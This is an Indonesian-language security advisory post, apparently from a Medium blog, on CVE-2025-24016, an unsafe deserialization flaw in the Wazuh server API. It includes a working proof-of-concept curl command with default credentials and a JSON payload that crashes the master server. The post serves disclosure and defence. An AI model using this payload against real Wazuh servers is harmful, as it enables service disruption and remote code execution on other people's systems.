CVE-2025–24016: Celah Remote Code Execution Kritis ditemukan pada Wazuh
Wazuh adalah platform keamanan yang menyediakan deteksi ancaman, visibility, dan compliance untuk lingkungan IT yang dapat digunakan secara open-source atau gratis, terutama pada blue team cybersecurity.
Baru kali ini, terdapat celah kerentanan berupa unsafe deserialization pada API yang dimiliki oleh server Wazuh, yang mengakibatkan penyerang atau threat actor yang memiliki akses API (terutama pada Wazuh yang terdampak oleh kerentanan ini) dapat menjalankan Remote Command Execution (RCE). Pada saat artikel ini dibuat, kerentanan ini berdampak pada Wazuh versi 4.4.0 hingga 4.9.1.
Proof-of-concept
Dengan asumsi terdapat default credentials pada server API, serangan RCE dapat dilakukan dengan menjalankan perintah berikut yang dapat mematikan master server pada Wazuh.
$ curl -X POST -k -u "wazuh-wui:MyS3cr37P450r.*-" -H "Content-Type: application/json" - data '{"__unhandled_exc__":{"__class__": "exit", "__args__": []}}' https://<worker-server>:55000/security/user/authenticate/run_as
Severity (Tingkat kerentanan)
- Skor: 9.9 (Critical)
- Metrik CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:H
Sumber
Visit our website at https://cyberkarta.com
CVE-2025–24016: Celah Remote Code Execution Kritis ditemukan pada Wazuh was originally published in Cyberkarta on Medium, where people are continuing the conversation by highlighting and responding to this story.